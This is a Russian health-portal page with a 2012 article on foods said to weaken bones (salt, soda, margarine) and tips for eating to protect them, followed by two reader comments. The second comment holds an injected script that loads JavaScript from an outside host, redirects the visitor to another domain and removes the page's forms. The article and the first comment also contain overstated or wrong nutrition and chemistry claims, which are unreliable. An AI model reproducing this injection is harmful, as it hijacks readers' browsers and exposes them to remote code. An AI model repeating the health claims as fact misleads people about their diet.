Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Еда, которая убивает кост...  >>  Еда, которая убивает кости
 
Обратная связь
 

Еда, которая убивает кости

Размер шрифта
05 апреля 2012 10:00
  • google_analytics: false
  • Нравится

У нас в холодильнике есть не только друзья, часто там можно обнаружить и наших врагов. Какие продукты вредны для костей человека?

Остеопороз – это заболевание костей, которое характеризуется потерей кальция, костная ткань при этом теряет свою массу, ее плотность уменьшается и кости становятся менее прочными. На развитие этого заболевания влияют разные факторы и один из них – вредные пищевые продукты.

Соленые продукты

Обычная поваренная пищевая соль содержит натрий, который является антагонистом кальция, т.е. разрушает его. Если человек съедает в сутки 2,3 г поваренной соли (это 0,5 чайной ложки соли) в любых соленых продуктах, то из костей при этом удаляется 40 мг кальция, что приводит к истончению костной ткани и ее разрушению.

Большое количество соли содержится в консервированных продуктах, т.к. соль – это универсальный консервант, а также концентратах супов, фаст-фуде, чипсах и т.п.

Сладкая газированная вода

Любая газированная вода имеет в своем составе фосфорную кислоту, что напрямую влияет на содержание кальция в костях, т.е. костная ткань истончается и кости становятся хрупкими.

Продукты с трансжирами

Простой маргарин содержит гидрогинезированные трансжиры. Это растительные жиры, которые в процессе производства обогащаются молекулами водорода, чтобы перевести их из жидкого состояния в твердое.

Маргарин широко используется в производстве различной выпечки: тортов, пирожных, кексов, пирогов, печенья и т.д.

Чем опасны трансжиры

Они блокируют так называемый витамин К, который, как известно, принимает участие в свертывании крови, но у этого витамина есть еще оно очень важное свойство. Витамин К участвует в формировании белкового матрикса (сетки), на который в костях наслаивается кальций. Из-за трансжиров этот матрикс не образуется, и молекулам кальция не за что цепляться.

Что делать

  • Употреблять в пищу продукты богатые витамином D, без которого усвоение кальция в нашем организме невозможно. Витамин D содержится в морской рыбе, а именно в рыбьем жире.
  • Обогащать свой рацион специальной зеленью: мангольдом, шпинатом, в которых есть кальций растительного происхождения.
  • Употребление грибов в пищу также даст нашему организму растительный кальций.
  • Молочные продукты, а особенно молоко, пополнят кости кальцием животного происхождения.

Питаться правильно не сложно, нужно только попробовать, и вам понравится быть здоровыми!

Сюжеты по теме:
Еда, которая убивает. Продукты, убивающие кости

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - helena

05 апреля 2012 в 13:53

Цитировать   |   Пожаловаться

Цитирую Вас: "Простой маргарин содержит гидрогенезированные трансжиры. Эторастительные жиры, которые в процессе производства обогащаютсямолекулами водорода, чтобы перевести их из жидкого состояния в твердое."
Если Вы все же проходили химию в ВУЗе (а должны были бы), то обязаны знать, что при насыщении водородом ненасыщенных связей жидких жиров эти ненасыщенные связи исчезают и возникновение изомеров (хоть цис, хоть транс) становится невозможным! При таком способе отверждения не появляются транс-жиры! И правильно пишется гидрогенизированные!

2 - zzzzzz

30 июня 2015 в 23:45

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Лучшая еда после застолья   В вопросе ГМО поставлена точка! Есть или не есть?   Пасхальный кулич с пользой   Творожная пасха: как подготовиться к празднику  

Слайдшоу

Ошибки в еде, которые вы точно делаете!    
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.